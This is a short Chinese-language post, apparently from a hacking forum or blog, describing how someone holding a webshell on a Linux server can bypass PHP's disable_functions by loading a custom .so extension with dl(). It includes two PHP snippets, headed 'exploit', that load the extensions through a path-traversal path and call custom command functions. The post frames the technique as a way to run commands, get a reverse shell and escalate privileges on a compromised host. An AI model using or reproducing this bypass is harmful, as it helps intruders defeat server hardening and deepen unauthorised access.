如果你拿到一个linux的webshell，而管理员禁用了
exec，system，passthru，popen，shell_exec等等PHP执行命令函数，导致不能执行命令来反弹SHELL提权
是不是很郁闷。
这里，php提供了一个扩展模块功能，使用dl函数能包含一个扩展模块。
类似.so或者想windows下的dll文件。可以自定义函数来调用linux命令。无视Disable_functions限制。

exploit：

<?php
//PHP4调用方法
dl('../../../../../home/apache/htdocs/php4.so');
biguanspider('uname -a');//调用函数
?>

<?php
//PHP5调用方法
dl('../../../../../home/apache/htdocs/php5.so');
spiderbiguan('uname -a');//调用函数
?>

哦对了dl函数这个缺陷已经在高版本中修补了。